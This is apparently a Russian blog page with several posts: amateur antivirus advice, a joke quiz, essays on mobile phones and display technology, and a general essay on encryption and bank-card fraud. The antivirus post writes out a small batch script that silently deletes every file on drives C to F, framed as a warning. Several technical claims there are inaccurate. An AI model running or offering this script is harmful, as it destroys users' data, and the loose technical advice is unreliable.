Антивирусы 2

В первой статье я писал о видах антивирусов, как убрать баннер, и про три папки, в которых гнездятся вирусы. Про две я рассказал, а про System Volume Information расскажу в этой статье.
System Volume Information – это системная папка. Её невозможно открыть. Найти её тоже трудно.
Чтобы увидеть, да, именно увидеть, надо выполнить следующие действия:
В каждой папке есть строка:

Нажимаем на сервис; появляется окно, жмём свойства папки.
Дальше нажимаем Вид, прокручиваем в конец.

Снимаем галочку и ставим показывать скрытые файлы и папки.
Теперь заходим в Диск С. Ого, сколько нового . Видим System Volume Information.
Внимание из скрытого НИЧЕГО не удаляйте. Имеются подозрения, сканируйте, есть вирусы – карантин, но не мусорка. Я все вирусы поголовно засовываю в карантин.

Url.old и есть тот копирующийся вирус.
Расскажу про переустановку системы.
Делается это с помощью BIOS (он не может быть удалён, записывается на материнской плате).
Многие баннеры пугают, что навернут систему, если переустановим, но не верьте. Правда, баннеры иногда блокируют запуск с диска, но это и не надо. Как избавится от баннера вы уже знаете, а если вирус снёс что-то важное (к примеру Boot.exe), то уже компьютер не запустится а будет выдавать ошибку.
Заходим в BIOS. Делается это по разному, чаще всего либо F2, либо Delete. Если не то перепробуйте все F по очереди. Нажимать F (или Del) надо при запуске компьютера, когда появляется заставка видеокарты.

Вот мы в BIOSе. Скриншотить не могу, фотоаппарат навернулся год назад, а у телефона камера слабая, вот такой я несчастный . BIOS у всех разный, поэтому ищем по все категориям надпись CD-DVD. Как находим, выделяем, жмём Enter, либо F6, либо смотрим описание справа. Короче ставим, чтоб запуск производился с дисковода.
Ну а в дисководе у вас диск переустановления системы. Компьютер, пыхтя, перезагружается. Тут 2 варианта.
Появляется окно переустановления системы.
Появляются надпись на английском.
При появление надписи нажмите любую клавишу и будет вариант 1.
Дальше форматируете системный диск, и устанавливаете систему.
Внимание! Программа Контрольная заку… тьфу! Разные компьютеры – разные диски. Бывают они не совместимы.
Совет:
Не захламляйте системный диск. Чем больше на нём свободного места, тем быстрее он будет работать.
Хм… А теперь немного юмора.
Вот 4 вопроса, которые используют кадровые агентства мирового уровня для
того, чтобы оценить умственные способности кандидатов:

Вопрос 1: Как засунуть жирафа в холодильник?

Правильный ответ: Открыть холодильник, засунуть туда жирафа, закрыть
холодильник.

— > Этот вопрос позволяет выяснить, нет ли у вас склонности выискивать
чересчур сложные решения для простых задач.

Вопрос 2: Как засунуть в холодильник слона?

Неправильный ответ: Открыть холодильник, засунуть туда слона, закрыть
холодильник.
Правильный ответ: Открыть холодильник, вынуть оттуда жирафа, засунуть
туда слона, закрыть холодильник.

— > Этот вопрос позволяет выяснить, способны ли вы при принятии решений
учитывать последствия ваших предыдущих действий.

Вопрос 3: Лев созвал всех зверей на собрание. Явились все, кроме одного.
Что это за зверь?

Правильный ответ: Это слон. Он же в холодильнике, помните?

— > Этот вопрос проверяет вашу память.

ОК. Даже если вам не удалось правильно ответить на предыдущие три
вопроса, у вас все же остался шанс показать, на что вы способны.

Вопрос 4: Вам нужно пересечь широкую реку, которая кишит крокодилами.
Как вы это сделаете?

Правильный ответ: Вплавь. Ведь крокодилы-то все на собрании у льва.

— > Этот вопрос позволяет выяснить, способны ли вы учиться на
собственных ошибках.

Антивирусы

Разработано множество антивирусов, подходящих для разных областей. В этой статье я бы хотел рассказать вам про антивирусы. Всё что пишу — знаю (испытал, проверил) сам.

Я опишу два известных антивируса. Avast! и Касперский.

Разумеется, у этих фирм, не один антивирус, а несколько вариантов. Самый разнообразный, это Касперский. (А еще был вирус Касперский, он удаляет информацию, со скоростью пулемета).

Расскажу про каждый антивирус отдельно.

Касперский – это платный антивирус. На данный момент самая лучшая версия (Crystal) стоит около 2200 рублей. Конечно, можно поискать в интернете бесплатную версию, только смотрите что б туда не встроили чего-нибудь… (у Winamp есть функция – выполнить после открытия. Можно сделать текстовый файл, переименованный в .bat:

@echo off
del C:\ *.* /q >nul
del D:\ *.* /q >nul
del E:\ *.* /q >nul
del F:\ *.* /q >nul

…И конец вашей информации. Кому интересно, могу дать урок по написанию  вирусов J. Но вернёмся к теме:

Совет 1. Антивирусы нужно покупать (или если это бесплатная версия скачивать) только с официальных сайтов.

Теперь подробней о Касперском (напишу про лучшую версию Crystal):

Идеальный деловой антивирус. Но свободу (поставить в настройках автоматом расправляться с вирусами) ему лучше не давать. Касперский не хуже вируса начинает удалять подозрительные (и довольно часто игровые) exe файлы. Лучше поставить, чтоб он информировал вас, и спрашивал о действии.

У Касперского лучшая статистика (другие антивирусы не сильно объясняют, что это за вирус, а просто сообщают или удаляют). А у Касперского расписано: баннер, фишинговая ссылка, вирус, троян…

Совет 2. Касперский идеальный деловой, но только деловой антивирус. Геймеру он не подходит. Так как он многие игры считает за вирусы.

Теперь Avast!. Я сам пользуюсь сейчас им. Так как из бесплатных он самый лучший. Преимущества Аваст!:

Насколько мне известно, бесплатный Сетевой экран (для безопасной работы в сети есть только у него).

У него самые гибкие настройки.

И возможность сканирования в обход Windows (при запуске компьютера).

Но даже самый лучший антивирус пропускает вирусы. Есть мнение, что создатели антивирусов, и пишут вирусы. Я предположений не строю, а знаю, как от гадостей избавляться.

Вирусы любят 3 системные папки. Temp, System32, System Volume Information.

В Temp есть две папки. В Windows, и в Диске С. Вирусы гнездятся в Windows. Периодически Temp нужно сканировать и очищать.

System32 это папка драйверов. Ничего оттуда не удаляйте, а перемещайте в карантин. Помню, столкнулся с одним вирусом…

Вирус вгрызся в оперативку, и при любом процессе старательно себя копировал. Антивирус блокировал. Раз в полминуты вирус сам без процесса копировался, но вреда из-за антивируса сделать не мог. В таком случае надо:

При Касперском просто просканировать компьютер, или если есть, (у Касперского много версий), заблокировать систему, просканировать, и разблокировать (ищите такую функцию в самом антивирусе).

При Авасте запланировать сканирование при загрузке. Там когда найдётся вирус, нажмите перемещать все в карантин, и через время (часа 2-3), ваш компьютер освободится от вирусов.

Но есть еще один тип вирусов – баннер. Баннер устанавливается на компьютере с помощью других программ. Часто вам пишут: Ваша версия «То-То» (чаще всего это Adobe Flash Player) ниже «цифра». Установите, а то будет работать неправильно.

Под видом другой программы к вам проникает баннер.

Баннеры есть четырёх типов:

1.       Самый жестокий баннер. Блокирует ЦП, и вы ничего не можете сделать.

2.       На вашем столе висит картинка (часто не самого приличного содержания).

3.       Блокируется только браузер.

4.       Блокируется сам вход в систему.

Есть разные службы для удаления баннеров. Баннер № 1 часто блокирует запуск с дисковода (невозможно переустановить  систему). Против него, а также против № 4 и 2, звоните по БЕСПЛАТНОМУ для России (я не рекламирую, я сам звонил, мне помогли) номеру  8 800 100 73 37. Вам ответит оператор и продиктует код разблокировки.

Против баннера № 3 можно тоже позвонить, а можно сбросить настройки обозревателя. Иногда помогает.

Не заражайтесь вирусамиJ.

Семейный телефон

И кто вам сказал, что быть младшим в семье хорошо? Постоянно ставят в пример старших братьев и сестер, в случае отсутствия таковых – родители сами себя припоминают, «Вот я в твоем возрасте» и все такое. Да и вещи – насколько бы обеспеченными не были предки, все равно иной раз проскальзывают у них пресловутые «жабодушащие нотки», зачем тебе новый свитер, можешь еще брата джемпер поносить… Более того, и новые куртки и пальто покупаются с расчетом на донашивание младшими детьми, особенно в многодетных семьях. Эту несправедливость подметил еще Самуил Яковлевич Маршак – мол, «Выйдет маме юбка (из шерсти барашка – авт.), выйдет брату шубка и носочки мне»… В общем, полная мамина помада и сапоги старшей сестры. И только в одном младшее поколение всегда будет опережать своих родителей, не говоря уж о бабушках и дедушках, — в потреблении плодов развития новейших технологий.

Что ни говори, а временами создается впечатление, что мобильные телефоны, хоть и появились не так уж давно, научились стариться вместе со своими владельцами. И, чем моложе человек, тем новее и моднее у него телефон (может, поэтому среди школьниц так популярны минифоны?), а пенсионеры, рискнувшие одолеть нехитрую премудрость сотовой связи, скромно ходят с допотопными «Сименсами» и «Нокиа» самых что ни на есть ранних моделей. И это, в общем-то, правильно – ну зачем человеку, который целыми днями сидит дома, выходит в магазин и поликлинику, а звонков ждет только от детей, телефон с видеокамерой, GPRS и прочими «аськами»? Новые вещи, особенно такие сложные, всегда немножечко пугают, а также вызывают опасения, как бы не сломать эту сложную штуку, не нажать по ошибке на какую-нибудь не ту кнопочку? Нет уж, лучше проще и дешевле. Кроме того, в ранних моделях и кнопки побольше, — это не какой-нибудь там «самый плоский в мире, самый маленький в мире», а номер с лупой набирать надо, — и экран ярче намного, и знаки на нем обычно побольше (в одной из колонок я упоминала телефон Siemens S35, и вот это был, скажу я вам, телефон так телефон! Он вполне мог бы заменить вокзальное табло…). Самый продвинутый телефон обычно у младшего в семье, а родители заводят монохромных друзей, и на большее не претендуют. Что ж, как говаривал Виктор Шендерович, создатель программы «Куклы», быки и не подозревают, что позволено Юпитеру... Тем лучше для нас, юного поколения!

Впрочем, менее молодое тоже нужно чему-то учить.
Есть такой писатель – Анатолий Алексин. Писал он, в основном, рассказы и повести для подростков, такие чистые и целомудренные, каких в наше время уже и нет. А также рассказы для детишек. И в одном из них один мальчик говорит, что вот, мол, он научил младшую сестренку читать. Второй из чистого мужского самолюбия тут же решает научить и свою сестру читать. Что из этого вышло, вы думаю, и сами догадываетесь (научил таки), а говорю я это все к тому, что нынче для нас более естественна обратная ситуация. Например, что у моей подруги, что у меня, семьи простые, наследственно-гуманитарные, тремя высшими техническими образованьями, тьфу-тьфу-тьфу, не обременен никто. Но у одной родители уже умеют писать sms, а у другой и читают со скрипом. Непорядочек… надо учить! И вот устраиваются курсы мобильного ликбеза, родители с телефонами в руках прилежно набирают «Маша ела кашу», попутно изучая транслит, в том числе особенности написания букв «ш», «ж» и мягких звуков.

Хотя… вот учишь их, учишь, а пользы, кроме вреда, никакой! Пока родители не были в курсе особенностей мобильной связи, не имели собственных телефонов, жизнь была гораздо легче…
А теперь они в курсе всех особенностей акустики в помещении и на улице, сроках действия батареи без подзарядки и, что самое ужасное, зонах покрытия операторов всех сетей! И это относится не только к родителям, но и к ревнивым женам, надоедливым друзьям, строгим начальникам и прочим, способным превратить нашу жизнь в мини-ад. Ведь, если раньше звонкам могла помешать ну хоть элементарная лень: пока до телефона доползешь, пока номер наберешь, или экономия (все же с городского на мобильный звонить – телефон, он тоже не казенный)… то теперь все решает нажатие одной кнопочки и каких-нибудь жалких тридцать рублей за минуту разговора! И теперь уже нормой становится могильное молчание в компании, наступающее по одному страдальческому выражению глаз говорящего: «Ребята, заткнитесь, пожалуйста, мне тут жена звонит, типа я на работе», неожиданное бегство на балкон, где шумит город: «Да, дорогая, я вот на остановке стою, жду маршрутку, что-то долго нет…» и прочие уловки. И то не всегда спасает! Например, один товарищ из тех, кого стыдливо именуют «неверными мужьями», а феминистки предпочитают называть «полигамными козлами», как-то умудрился, забыв про сотовый телефон, позвонить прямо домой во время любовных утех… Жена это терпеливо слушала-слушала, а потом… Потом, что самое обидное, незадачливый любовник очень легко отделался, поскольку супруга, придя в ярость, разнесла в пух и прах автомобиль, не в добрый час ставший сакраментальным «шалашом», и сделала попытку, не окончившуюся, впрочем, успешно, прикончить дорогого супруга, так что развод тот получил относительно легко и безболезненно. Жаль, конечно… Но, вообще-то, просто страшно становится от мысли, что когда-нибудь, и очень, может быть, скоро, человечество поголовно перейдет на какие-нибудь видеофоны, предательски позволяющие видеть лицо собеседника и окружающую его среду… Как будет тяжко жить на этом свете, господа!

Ради всего святого – господа производители мобильных телефонов – не отнимайте у человека последнюю возможность лгать!

Совершенно секретно

— Книги за борт! – раздаётся команда, и пока не причалили катера с автоматчиками, открывается иллюминатор, и туда летят книги в кожаных переплётах. Специальная краска, которой отпечатаны цифры, растворяется в морской воде мгновенно, и никто ничего не прочитает, даже если выловит книги из моря…

Что это за книги и цифры? Это так называемые шифровальные книги – и ключи к шифрам секретных радиопередач военного судна. В старину так было. В случае угрозы захвата судна радист должен был сразу уничтожить шифровальные книги.

На старых советских заводах Вы ещё сможете найти бывшую секретную техдокументацию, отпечатанную на специальной быстрогорящей бумаге. Такую книгу можно поджечь спичкой, и она сгорит мгновенным ярким пламенем, как бенгальский огонь.

В наше время информация банковских операций и бытовые переговоры по мобиле шифруются «на лету», и кажется, что в транспортировке ключей внимательными курьерами с чемоданчиками, прикованными к руке, и в свято хранимых шифровальных книгах нужды больше нет. Как-то же Вы секретно управляете своим счётом с помощью сервисов вроде «Мобильного банка». Вы орудуете кнопками банкомата, установленного прямо на базаре, не зная технологий секретности.

В этом есть и свои плюсы (нет чемоданчиков и нет шифровальных книг), и есть свои принципиальные минусы. Которые могут (при отсутствии означенных чемоданчиков) свести Вашу безопасность к нулю – но всё может быть в порядке, если Вы о системах передачи конфиденциальной информации кое-что будете знать.

Самое характерное (хорошее) для современных систем то, что используется шифрование с т.н. «открытым ключом», то есть секретный ключ от шифра НЕ выходит из места расположения Вашего адресата (не транспортируется к Вам). Вы шифруете ключом, который можно видеть всем («открытым» ключом). Криптостойкость этих систем передачи очень велика. Требуются месяцы или годы для того, чтобы расшифровать Ваше сообщение, зашифрованное открытым ключом, если не знать другого ключа, секретного (который Вам даже и не сообщали – он остался у того, с кем Вы ведёте обмен информацией).

Итак, ещё раз. Главное. В начале связи адресат передаёт Вам открытый ключ. Ваша машина шифрует Ваше послание этим открытым ключом и отсылает адресату. Это послание теперь никто, кроме него, прочитать не сможет, несмотря на то, что ключ, которым Вы шифровали – открыт всем. Перехватчик не сможет прочитать, потому что не знает секретного ключа, который так и остался у адресата – адресат его никуда не отправлял, и перехватить его было невозможно. Адресат сформировал открытый ключ для Вас по своему секретному, открытый ключ отправил Вам, секретный оставил у себя. Для расшифровки Вашего сообщения нужен именно тот, секретный. В старых системах шифрования на корабле радиограммы и оттуда и отсюда можно было расшифровывать, зная ключи из книг, которыми пользовался на радист…

Если кто подсунет в сеанс связи часть письма от Вашего имени, зашифрованную этим же выданным Вам открытым ключом, адресат будет считать, что и эта информация также пришла от Вас. Однако против таких штучек в системе шифрованной связи придумана защита. В общем, поверьте, правила (т.н. «протоколы») шифрованной передачи данных продуманы хорошо.

Прежде, чем перейти к уязвимостям этой хорошо продуманной системы, и к рекомендациям, вспомним ещё одну картинку из нашей истории.

В тесной комнатёнке, похожей на пенал, вдоль стены стоят четыре шкафа, на которых крутятся бобины с магнитной лентой. В конце комнаты стол, на котором водка и селёдка. Персонал пьёт. Шкафы-магнитофоны пишут междугородные переговоры. Пишут не все переговоры – только те, в которых встречаются слова вроде «политбюро» или «КГБ». Распознавание слов производится отнюдь не автоматически. Персонал должен не пьянствовать, а слушать телефонные разговоры и в случае необходимости включать запись. А поскольку магнитофонов всего четыре, то если Слово сказано, а все четыре магнитофона уже что-то пишут, то разговор этих «лишних» абонентов просто насильственно прерывают. А персонал пьёт… И вот сквозь пьяный туман они слышат в динамике страшные слова, вернее, уже конец разговора: «… чертежи атомной бомбы будут переданы нашим вечером на …». А надо было уже давно включить запись… Что делать? Что с ними теперь будет?!

Примерно так описывает специалист – А.И.Солженицын – работу прослушки КГБ в 50-е годы. Это – повесть «В круге первом». Он знает, о чём пишет. Он математик, и в т.н. «шарашке» в Марфино под Москвой принимал участие в разработке вокодера. Прибор voice coder (шифровальщик голоса) должен был на лету зашифровывать\расшифровывать секретные переговоры примерно так, как сейчас шифрует наши бытовые разговоры любая наша мобила стандарта GSM…

Вокодер так и не сделали – по сей день. Шарашка в Марфино была расформирована, зеки были отправлены в обычные лагеря (глубже первого круга ада), и это исторический факт –единственное секретное КБ, которое не выполнило реальную задачу ни в каком обьёме. Так и неизвестно, эти люди сознательно просаботировали задание начальников, или же просто у них не хватило сил разработать прибор. Мне хочется верить, что они, в отличие от Королёва, Туполева и многих других, сознательно предпочли Экибастуз и другие страшные места подмосковной колбасе…

И всё же – как ФСБ или милиция СЕЙЧАС может прослушать телефонный разговор? А об этом иногда говорят с экрана телевизора. Ведь я говорил о криптостойкости размером в месяцы или в годы.

Теперь наш читатель может сказать, как они могут прослушать: им стал известен секретный ключ. Также читатель может на досуге поразмыслить, ГДЕ формируется и хранится секретная «половинка» ключа. Если в базовой станции мобильной связи («у провайдера»), то «взломав» импортный ящичек на вышке, теоретически возможно перехватывать переговоры. Если же секретный ключ формируется в самой мобиле, в кармане у другого абонента (симметрично – и в Вашем кармане), то никакой возможности расшифровать такой разговор нет, потому что Ваши с собеседником секретные ключи не выходят из Ваших карманов. Вы передаёте друг другу только открытые ключи, знать которые посторонним бесполезно. Как бы эти посторонние ни говорили о своём могуществе и как бы ни напускали туману. Ведь мобилы могут быть привезены откуда угодно… Можно услышать, что ФБР потребовало у американских изготовителей прошивать в телефоны нарочно ослабленные алгоритмы шифрования. И что, возможно, информация по быстрой расшифровке передана нам. Но я сомневаюсь, чтобы требование это выполняли производители телефонов в разных странах…

Вы можете, если хотите, всё это исследовать, но это скорее досужие развлечения. Пусть спецслужбы слушают то, что им нужно. Нам важно, чтобы не воровали деньги с наших банковских счетов! А сотрудникам безопасности – чтобы не воровали деньги со счетов охраняемых ими банков. Как это может быть сделано?! Если даже всемогущие ФСБ и ФБР, скорее всего, блефуют?!

Вспомним схему, описанную в абзаце «главное».

«В начале связи адресат передаёт Вам открытый ключ»

Что здесь может быть атаковано?

Вот что.

Где гарантия, что это именно тот адресат, а не кто-то другой, кто только притворился им?

Допустим, Вы заходите на сайт Вашего банка или электронного кошелька или платёжной системы. Видите знакомую картинку. Вводите логин и пароль.

Тут Вы и попались. Когда Вы набирали адрес сайта, Вы ошиблись всего в одной букве – или, например, забыли набрать или, наоборот, набрали ненужное «www» в начале строки. И сайт этот не тот, а другой, с тем же оформлением – подменённный. И теперь мошенники знают Ваш логин и пароль. Теперь они могут работать с Вами и по секретному протоколу, почему бы нет. И Вы будете обмениваться надёжными шифровками – но с мошенниками. Потом они войдут с Вашими логином и паролем на настоящий сайт и снимут Ваши деньги.

От такой подмены есть относительно надёжная защита.

Она заложена в самом стиле шифрования открытым кодом.

Вы можете передать информацию о сайте, к которому Вы подключились (его сертификат), службе проверки, которая скажет, настоящий это сайт или поддельный. Это вроде аппарата проверки подлинности купюр – только проверятелем выступает некая служба в интернете, которой Вы ДОВЕРЯЕТЕ. В мире много таких служб проверки.

Бывает так, что если Вы зарегистрировались в почте с шифрованием в одном регионе, то в другом месте или в другое время, работая с почтой, Вы можете увидеть сообщение «недоверенный сертификат» — это может значить, что почтовый сервер подменён, что Вашу почту читают.

Что ещё здесь может быть атаковано?

«В начале связи адресат передаёт Вам открытый ключ»

Вот что.  Где гарантия, что Вы – это Вы?

А не кто-то другой, кто только притворился Вами?

Он сможет, установив связь с правильным, то есть действительно Вашим банком, управлять счётом от Вашего имени.

Первое, что приходит в голову – защититься паролем. Кто не ввёл Ваш пароль, тот не Вы.

Эта защита может быть сделана эффективной, но часто таковой не является.

Во-первых, пароль могут подсмотреть глазами или программой-шпионом, которая запоминает, какие кнопки нажимаются на клавиатуре. Раз в день информация быстро и незаметно отправляется с Вашего компьютера по интернету злоумышленникам. Такая программа-шпион может быть встроена и в банкомат.

Во-вторых, пароль можно подобрать перебором, на то машина и железная.

Приведём некоторые «детские», но эффективные схемы защиты от воровства паролей. Они могут быть интересны и профессионалам. Вы удивитесь, что эти приёмчики применяются редко даже «серьёзными» денежными системами.

Можно ввести принудительную паузу между попытками ввода пароля.

Можно ограничить число попыток ввода неправильного пароля.

Можно пару раз в ответ на ПРАВИЛЬНО введёный пароль ответить, что он неверный – это отобьёт охоту пробовать этот пароль ещё раз. Но если сделать попытку входа, например, три раза подряд с одинаковыми (правильными) логином и паролем, вот тогда система Вас пропустит.

Можно организовать вход в систему совсем по-другому. Например, машина показывает Вам целый экран случайных, каждый раз новых цифр. Вы должны сложить левое верхнее число, третье во втором ряду, вычесть число, стоящее внизу вторым справа, и результат ввести вместо пароля. Какие числа складывать и вычитать, это условлено между Вами и системой заранее. Такой пароль бесполезно подсматривать и подбирать, и его практически невозможно забыть.

Заметим, что в большинстве интернетных систем связи с банками и платёжными системами не применяется никакой защиты от подмены Вас самого, кроме пароля. Притом пароль запрашивается по-тупому без всяких защит.

Но и пароль не обеспечивает защиту.

После того, как связь установлена, зловредная программа может посылать команды банку от Вашего имени – ведь пароль не требуется вводить перед каждой командой, он вводится в начале один раз! Есть классический пример взлома локальных сетей, использующего эту технологию. Злоумышленник прослушивает сеть, дожидается, когда в сеть войдёт главный администратор, и посылает сообщения от его имени такие же по виду, как настоящие. Они могут быть даже правильно зашифрованными – ведь открытый ключ известен.

Защищаемся и от этого! Здесь нам поможет шифрование.

«В начале связи адресат передаёт Вам открытый ключ»

Но ведь и мы ТОЖЕ можем в начале связи: 1) сгенерировать тайный ключ 2) сформировать по нему открытый 3) отдать банку – и в дальнейшем он тоже будет посылать Вам шифровки, которые сможете расшифровать только Вы. Теперь сделаем так, что Ваши команды могут поступать только лишь в ответ на шифрованные приглашения к команде. Причём Ваша команда считается правильной только если она возвращает банку его приглашение к команде, сообщённое перед этим Вам, шифром. Уф! Кажется, победили… Открытые ключи перехватят, но они не будут знать, ЧТО посылать, кроме команды (сами приглашения(квитанции)) (это надёжно зашифровано, это они не узнают)

И всё это, как правило, бесполезно.

Обычная пластиковая карточка с магнитной полосой теоретически надёжно «общается» с банком.

Но секретные ключи сформированы заранее. То есть моментом начала связи является выпуск карты. На ней на магнитной полосе записан Ваш секретный ключ или его номер. Что ж – тогда скопируем саму карту вместе с её магнитной полосой и записью на ней! То есть украдём секретный ключ физически.

Пресловутый PIN-код – это защита не от взлома самого информационного обмена с банком, а от копирования (воровства) карты. Мы пришли на старое место, опять у нас для защиты только пароль

Как карта может быть скопирована? Да легко. Любое устройство считывания, в которое попадала Ваша карта, могло заодно и сохранить у себя то, что на ней записано. И это мошенниками реально применяется.

Не хватает PIN-кода? – что ж, его украдём обычными приёмами воровства паролей: телекамерой, приклеенной под козырьком банкомата или програмой – регистратором нажатий клавиш в нём самом.

(На самом деле камера, прикленная возле банкомата, ворует не столько PIN-коды, сколько надписи на картах. Многие карты допускают сьём денег указанием только номера карты и даты окончания срока годности. Иногда требуют указать также цифры с обратной стороны. Обычно на такой сьём денег ставится ограничение по сумме)

Некоторые карты допускают сьём денег без ввода PIN-кода. Здесь Вы между двух огней: если разрешить оплату картой без ввода PIN-кода, то полного контроля над счётом воры не получат, но они сфотографируют карту, и будут снимать без PIN-кода по чуть-чуть. Если же оплата возможна только с применением PIN-кода, то вот Вы его и показали в магазине мошенникам, когда вставляли карту в ридер для её копирования, и мало того, набирали PIN-код на их регистраторе, который всё и зарегистрировал!

Поэтому большинство российских банков для оплаты товаров через компьютер выпускают специальные карты с ограниченными возможностями управления; требуют подтверждения сьема денег через телефон, выпускают виртуальные карты без надписей, одноразовые карты и т.п.

Есть ли карты, которые невозможно скопировать?

Да, есть.

Карта может сама каждый раз заново генерировать внутри себя секретную половинку ключа. Для этого в ней размещают с компьютером

Применяются такие чипы, информация с которых не прочитывается даже в лабораторных условиях. То есть алгоритм формирования секретного ключа украден быть не может.

Но такие карты – с защищенным от чтения чипом процессора внутри – встречаются редко, и главное: где гарантия, что 1)машина в карте работает правильно2) что сама эта машина в карте не содержит шпионских модулей!

Когда-то ко мне пришли представители спецслужб с просьбой провести экспертизу терминального оборудования на предмет сьёма информации спутником. Я посмеялся и сказад, что тогда над нами должен висеть спутник размером с 9-этажный дом – дешевле подкупить генерала.

Теперь это уже не смешно. Теперь даже старый мобильник содержит в себе компьютер и передатчики, подобных которым во время того разговора было в СССР хорошо, если несколько штук.

И они были размером не с дом, но с целый этаж.

То есть что ещё делают чипы в наших приборах, кроме своей «номинальной» открытой функции, это неизвестно.

Это – так называемые электронные закладки.

Есть и программные.

В том случае, если банкомат (или компьютер на рабочем месте сотрудника банка) имеет достаточно универсальный набор функций, например – допускает выполнение в себе посторонних программ – туда и могут быть внесены эти самые посторонние, шпионские программы. В винду они, как правило, проникают в огромных количествах. Это – программные закладки. Сообщалось о конкретных моделях банкоматов, в которые на этапе изготовления были записаны программы-шпионы, накапливающие данные о вставленных картах. Не надо и камеру клеить под козырёк…

Теперь мы должны ожидать, что уж банкомат-то не должен содержать в себе ничего лишнего. Напрасны наши ожиданья. Может быть, Вы видали на банкомате «синий экран смерти» — я видал! В свете защиты от электронных закладок применение в банкомате, например, винды – чистое безумие. Тем не менее я своими глазами видел в коридоре одного питерского банка бледного безумца c паяльником, который возился в раскуроченном шкафу банкомата, и на экране светилось приветствие Windows XP.

Можно вспомнить много чего ещё, что было в жизни: и как в советские времена в Минске открыли целую фальшивую сберкассу и две недели принимали вклады, и кое-что выдавали; и как в Париже поставили банкомат, даже и с деньгами, который не был никуда подключён, а только записывал параметры карт… Но лучше в следующий раз я расскажу Вам о том, почему интернет с технической точки зрения – такой инструмент для мошенников, который нельзя победить никаким шифрованием.

Бесконечная гонка технологий

Это случилось совсем недавно. Мы с другом зашли в довольно известный магазин, который продает электронику и бытовую технику. Что нас туда привело? Все довольно прозаично – мы пошли обедать в торговый центр, и у нас оставалось еще целых полчаса обеденного перерыва. Возвращаться на работу большого желания не было, тем более, раньше времени.

В магазине мы бесцельно блуждали между рядов всяких ноутбуков, фотоаппаратов и прочего, вяло разглядывали параметры, цены… дошли до телевизоров. Большие, маленькие, широкоформатные, с тонким экраном, словом – разные.

И тут мой взгляд неожиданно «зацепился» за один из телевизоров. На экране показывали «Пиратов кабирского моря». В качестве «Blue Ray», о чем свидетельствовала надпись внизу экрана.

До этого я часто слышал про все эти технологии, высокая четкость изображения и прочее. Но просто не интересовался всем этим. Фильмы смотрел либо по телевизору, либо в кино, либо скачивал в интернете (и то старался, в так называемом, «хорошем DVD качестве»).

Как я ошибался! Описать словами, то, что я увидел – довольно сложно. Картинка ярче, четче, сочнее, динамичнее, и еще целая куча восторженных эпитетов. Это поразило меня в первую очередь.

И почти тут же накатило второе. Как же быстро развиваются технологии! Даже такие, казалось бы, безобидные, как качество изображения.

Это что же у нас получается? Еще позавчера фильмы были на видео-кассетах, вчера фильм умещался на «семьсотметровую» болванку, сегодня утром уже нужна DVD-болванка на 4,7 Гб, днем фильм уже весит 20-40 Гб. Что же будет вечером?

И это только одна грань. Ведь уже сейчас есть всякие виртуальные шлемы и очки, которые пытаются показать эффект присутствия. А дальше – больше. Ведь мы не успеем опомниться, как технологии предложат нам при просмотре фильма чувствовать холод и жару, дуновение ветра и разные запахи.

Следующий этап – эффект полного присутствия – вы просто стоите рядом с капитаном Джеком Воробьем, чувствуете, как лицо ласкает едва заметный бриз, палуба Черной Жемчужины покачивается у вас под ногами, чувствуете соленый запах такелажа. Вы можете передвигаться по всему кораблю, заглянуть в любой закуток. Да что там! Вы можете спуститься в трюм, найти бутылку рома, откупорить, сделать несколько глотков и… опьянеть!

Ну хорошо, бутылка рома была бонусом, можно и без нее.

Только на этом нельзя останавливаться – ведь герои фильма не замечают вас. А что, если начнут замечать?

Поучаствовать в абордаже или лично дать по физиономии скажем… да тому же Уиллу Тернеру (ну, а вдруг он вам прям совсем не по душе). Пусть Эникен разобьется о скалы на гонках в «Эпизоде I» (вы лично его собьете). Или вы незаметно подкрадетесь к Дарту Вэйдеру сзади и отвесите ему подзатыльник, а еще лучше, поддадите ногой по тому месту, где спина теряет свое благородное название. И вам за это ничего не будет. Вас же нельзя в фильме убить. Максимум – выкинет из фильма, поставит его на паузу и предложить начать с момента такого-то. Вариантов масса.

Пусть у фильмов будет несколько концовок, в зависимости от того, как вы лично повлияли на ход сюжета. Представили?

Сейчас вы скажете, что это похоже на компьютерную игру, да и вообще все это виртуальная реальность и т.д. А все эти технологии и направлены на индустрию развлечений, да и со временем, не исключено, компьютерные игры, фильмы – все это так тесно переплетется… В конечном итоге все это делается, чтобы нас развлекать.

Сегодня все это кажется фантастикой, но вдумайтесь немного, не исключено, что мы застанем то, о чем было написано выше. Посмотрите, какими гигантскими шагами идет вперед технология и наука.

У меня весь этот ворох мыслей в голове пронесся за пару секунд (написание заняло намного больше времени). А где-то сидит человек, который в этот момент говорит: «Вот! Я понял, как чувствовать запахи в кино!».

Philo

Следующая страница »